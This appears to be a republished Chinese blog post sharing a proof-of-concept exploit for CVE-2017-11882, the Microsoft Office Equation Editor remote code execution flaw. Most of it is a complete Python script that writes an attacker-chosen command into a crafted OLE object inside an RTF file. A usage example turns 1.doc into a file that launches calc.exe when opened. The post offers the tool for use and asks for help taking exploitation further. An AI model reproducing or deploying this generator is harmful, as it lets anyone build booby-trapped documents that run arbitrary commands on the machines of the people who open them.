Office--CVE-2017-11882远程代码执行

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Office--CVE-2017-11882远程代码执行相关的知识,希望对你有一定的参考价值。

Office远程代码执行漏洞现POC样本

最近这段时间CVE-2017-11882挺火的。关于这个漏洞可以看看这里:https://www.77169.com/html/186186.html

今天在twitter上看到有人共享了一个POC,https://twitter.com/gossithedog/status/932694287480913920,http://owned.lab6.com/%7Egossi/research/public/cve-2017-11882/,后来又看到有人共享了一个项目https://github.com/embedi/CVE-2017-11882,简单看了一下这个项目,通过对rtf文件的修改来实现命令执行的目的,但是有个缺陷就是,这个项目使用的是使用webdav的方式来执行远程文件的,使用起来可能并不容易,所以就对此文件进行了简单的修改,具体项目地址如下:

POC地址:https://github.com/Ridter/CVE-2017-11882/

POC源码如下:

  1 import argparse
  2 import sys
  3 
  4 
  5 RTF_HEADER = R"""{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}
  6 {\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1
  7 \\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9"""
  8 
  9 
 10 RTF_TRAILER = R"""\\par}
 11 """
 12 
 13 
 14 OBJECT_HEADER = R"""{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}\\objw380\\objh260{\\*\\objdata """
 15 
 16 
 17 OBJECT_TRAILER = R"""
 18 }{\\result {\\rtlch\\fcs1 \\af0 \\ltrch\\fcs0 \\dn8\\insrsid95542\\charrsid95542 {\\pict{\\*\\picprop\\shplid1025{\\sp{\\sn shapeType}{\\sv 75}}{\\sp{\\sn fFlipH}{\\sv 0}}
 19 {\\sp{\\sn fFlipV}{\\sv 0}}{\\sp{\\sn fLockAspectRatio}{\\sv 1}}{\\sp{\\sn pictureGray}{\\sv 0}}{\\sp{\\sn pictureBiLevel}{\\sv 0}}{\\sp{\\sn fRecolorFillAsPicture}{\\sv 0}}{\\sp{\\sn fUseShapeAnchor}{\\sv 0}}{\\sp{\\sn fFilled}{\\sv 0}}{\\sp{\\sn fHitTestFill}{\\sv 1}}
 20 {\\sp{\\sn fillShape}{\\sv 1}}{\\sp{\\sn fillUseRect}{\\sv 0}}{\\sp{\\sn fNoFillHitTest}{\\sv 0}}{\\sp{\\sn fLine}{\\sv 0}}{\\sp{\\sn fPreferRelativeResize}{\\sv 1}}{\\sp{\\sn fReallyHidden}{\\sv 0}}
 21 {\\sp{\\sn fScriptAnchor}{\\sv 0}}{\\sp{\\sn fFakeMaster}{\\sv 0}}{\\sp{\\sn fCameFromImgDummy}{\\sv 0}}{\\sp{\\sn fLayoutInCell}{\\sv 1}}}\\picscalex100\\picscaley100\\piccropl0\\piccropr0\\piccropt0\\piccropb0
 22 \\picw353\\pich600\\picwgoal200\\pichgoal340\\wmetafile8\\bliptag1846300541\\blipupi2307{\\*\\blipuid 6e0c4f7df03da08a8c6c623556e3c652}0100090000035100000000001200000000000500000009020000000005000000020101000000050000000102ffffff00050000002e0118000000050000000b02
 23 00000000050000000c02200240011200000026060f001a00ffffffff000010000000c0ffffffaaffffff00010000ca0100000b00000026060f000c004d61746854797065000040000a00000026060f000a00ffffffff010000000000030000000000}}}}
 24 """
 25 
 26 
 27 OBJDATA_TEMPLATE = R"""
 28 01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1
 29 b11ae1000000000000000000000000000000003e000300feff090006000000000000000000000001
 30 0000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffff
 31 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 32 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 33 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 34 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 35 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 36 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 37 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 38 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 39 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 40 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 41 fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffe
 42 fffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 43 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 44 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 45 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 46 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 47 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 48 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 49 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 50 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 51 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 52 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 53 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 54 ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0074007200790000
 55 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 56 00000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000
 57 000000000000008020cea5613cd30103000000000200000000000001004f006c0065000000000000
 58 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 59 00000000000000000000000a000201ffffffffffffffffffffffff00000000000000000000000000
 60 0000000000000000000000000000000000000000000000000000001400000000000000010043006f
 61 006d0070004f0062006a000000000000000000000000000000000000000000000000000000000000
 62 00000000000000000000000000000000000000120002010100000003000000ffffffff0000000000
 63 00000000000000000000000000000000000000000000000000000000000000010000006600000000
 64 00000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000
 65 00000000000000000000000000000000000000000000000000000012000201ffffffff04000000ff
 66 ffffff00000000000000000000000000000000000000000000000000000000000000000000000003
 67 0000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000fe
 68 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 69 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 70 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 71 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 72 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 73 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 74 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 75 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 76 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 77 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 78 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 79 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 80 ffffff01000002080000000000000000000000000000000000000000000000000000000000000000
 81 0000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02
 82 ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e
 83 30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b271000000
 84 00000000000000000000000000000000000000000000000000000000000000000000000000030004
 85 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 86 000000000000000000000000000000000000001c00000002009ec4a900000000000000c8a75c00c4
 87 ee5b0000000000030101030a0a01085a5a4141414141414141414141414141414141414141414141
 88 414141414141414141414141414141414141414141120c4300000000000000000000000000000000
 89 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 90 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 91 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 92 00000000000000000000000000000000000000000000000000000000000000000000004500710075
 93 006100740069006f006e0020004e0061007400690076006500000000000000000000000000000000
 94 0000000000000000000000000000000000000020000200ffffffffffffffffffffffff0000000000
 95 0000000000000000000000000000000000000000000000000000000000000004000000c500000000
 96 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 97 00000000000000000000000000000000000000000000000000000000000000ffffffffffffffffff
 98 ffffff00000000000000000000000000000000000000000000000000000000000000000000000000
 99 00000000000000000000000000000000000000000000000000000000000000000000000000000000
100 000000000000000000000000000000000000000000000000000000000000000000000000000000ff
101 ffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000
102 00000000000000000000000000000000000000000000000000000000000000000000000000000000
103 00000000000000000000000000000000000000000000000000000000000000000000000000000000
104 00000000000000ffffffffffffffffffffffff000000000000000000000000000000000000000000
105 00000000000000000000000000000000000000000000000000000001050000050000000d0000004d
106 45544146494c4550494354003421000035feffff9201000008003421cb010000010009000003c500
107 000002001c00000000000500000009020000000005000000020101000000050000000102ffffff00
108 050000002e0118000000050000000b0200000000050000000c02a001201e1200000026060f001a00
109 ffffffff000010000000c0ffffffc6ffffffe01d0000660100000b00000026060f000c004d617468
110 54797065000020001c000000fb0280fe0000000000009001000000000402001054696d6573204e65
111 7720526f6d616e00feffffff6b2c0a0700000a0000000000040000002d0100000c000000320a6001
112 90160a000000313131313131313131310c000000320a6001100f0a00000031313131313131313131
113 0c000000320a600190070a000000313131313131313131310c000000320a600110000a0000003131
114 31313131313131310a00000026060f000a00ffffffff0100000000001c000000fb02100007000000
115 0000bc02000000000102022253797374656d000048008a0100000a000600000048008a01ffffffff
116 7cef1800040000002d01010004000000f0010000030000000000
117 """
118 
119 
120 COMMAND_OFFSET = 0x949*2
121 
122 
123 def create_ole_exec_primitive(command):
124     if len(command) > 43:
125         print "[!] Primitive command must be shorter than 43 bytes"
126         sys.exit(0)
127     hex_command = command.encode("hex")
128     objdata_hex_stream = OBJDATA_TEMPLATE.translate(None, "\\r\\n")
129     ole_data = objdata_hex_stream[:COMMAND_OFFSET] + hex_command + objdata_hex_stream[COMMAND_OFFSET + len(hex_command):]
130     return OBJECT_HEADER + ole_data + OBJECT_TRAILER
131 
132 
133 
134 def create_rtf(header,command,trailer):
135     ole1 = create_ole_exec_primitive(command + " &")
136     
137     # We need 2 or more commands for executing remote file from WebDAV
138     # because WebClient service start may take some time
139     return header + ole1 + trailer
140 
141 
142 
143 if __name__ == __main__:
144     parser = argparse.ArgumentParser(description="PoC for CVE-2017-11882")
145     parser.add_argument("-c", "--command", help="Command to execute.", required=True)
146     parser.add_argument(-o, "--output", help="Output exploit rtf", required=True)
147 
148     args = parser.parse_args()
149 
150     rtf_content = create_rtf(RTF_HEADER, args.command ,RTF_TRAILER)
151     
152     output_file = open(args.output, "w")
153     output_file.write(rtf_content)
154 
155 print "[*] Done ! output file --> " + args.output

使用方式很简单,如果要执行命令:

python python.py -c "cmd.exe /c calc.exe" -o 1.doc,则:

技术分享图片

那么相应地生成了1.doc文件:当我打开1.doc的时候 会提示如下信息:

技术分享图片

点击允许之后:

技术分享图片

就会自动调用计算器,关于进一步的漏洞利用,还需要各位大佬指点,非常感谢!!!

 

以上是关于Office--CVE-2017-11882远程代码执行的主要内容,如果未能解决你的问题,请参考以下文章

代做远程系统系统代写远程终端管理系统

远程代答平台的使用心得

远程代答平台如何实现打码盈利?

Git如何从远程拉取最新代码,并与本地代

Android 逆向Android 进程注入工具开发 ( 注入代码分析 | 远程调用 目标进程中 libc.so 动态库中的 mmap 函数 三 | 等待远程函数执行完毕 | 寄存器获取返回值 )(代

CTFshow刷题日记-WEB-PHPCVE(web311-315)包括PHP-fpm远程代码执行,PHPimap_open函数任意命令执行,PHP-CGI远程代码执行,XDebug 远程调试漏洞(代